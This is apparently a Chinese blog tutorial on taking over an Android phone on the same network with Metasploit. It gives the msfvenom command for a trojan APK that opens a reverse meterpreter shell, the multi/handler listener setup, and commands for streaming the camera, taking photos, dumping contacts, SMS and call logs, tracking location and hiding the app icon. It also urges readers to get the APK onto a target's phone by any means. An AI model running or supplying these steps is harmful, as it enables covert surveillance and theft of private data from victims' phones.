入侵同一网段内安卓手机(同一网段)

实战入侵同一网段内Android手机

确认环境以及准备

**1. Windows物理机 IP地址:192.168.1.100

  • 攻击机 kali系统虚拟机 IP地址:192.168.1.126
  • 靶机 Android手机 IP地址:192.168.1.180
  • “”一定要保证虚拟机和手机之间的网络能ping通,不要有丢包的现象**。**

接下来开始进入正题
实验过程如下

  • 打开kali系统虚拟机,进入终端,输入下面代码,生成木马病毒,攻击payload
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.126 lport=55555 R > /test/newbie.apk

注释线
############
上面代码lhost后面的IP地址为攻击机IP地址,lport端口号,/test/newbie.apk为生成目录以及文件,.apk为安卓手机通用安装文件。
############
将生成的木马导出到Windows系统,发送至对方手机安装,这个凭各位本事。

使用msfconlose框架
使用探测句柄

use exploit/multi/handler 加载模块
set payload android/meterpreter/reverse_tcp 选择Payload
show options 查看参数设置
lhost => 192.168.1.126
lport => 55555(IP地址和端口为刚才设置的地址与端口)

接下来开始进入监听,等待手机上线,输入exploit
手机上线成功。

输入sysinfo可以查看手机信息。

查看手机有多少个摄像头
webcam_list
入侵同一网段内安卓手机(同一网段)_第1张图片
.开启摄像头
webcam_stream
入侵同一网段内安卓手机(同一网段)_第2张图片
.导出电话号码
dump_contacts

入侵同一网段内安卓手机(同一网段)_第3张图片导出短信信息
dump_sms
入侵同一网段内安卓手机(同一网段)_第4张图片
通过摄像头拍照功能
webcam_snap
入侵同一网段内安卓手机(同一网段)_第5张图片
其他命令

hide_app_icon //隐藏手机端木马程序图标
dump_calllog //获取通话记录
geolocate //获取手机的当前的经纬度
set_audio_mode //Set Ringer Mode
sqlite_query //Query a SQLite database from storage
wakelock // Enable/Disable Wakelock`在这里插入代码片`
wlan_geolocate // Get current lat-long using WLAN information
app_install // Request to install apk file
app_list // List installed apps in the device
app_run // Start Main Activty for package name
app_uninstall //Request to uninstall application

**

禁止违法,后果自负

**
©曹天才

你可能感兴趣的:(个人)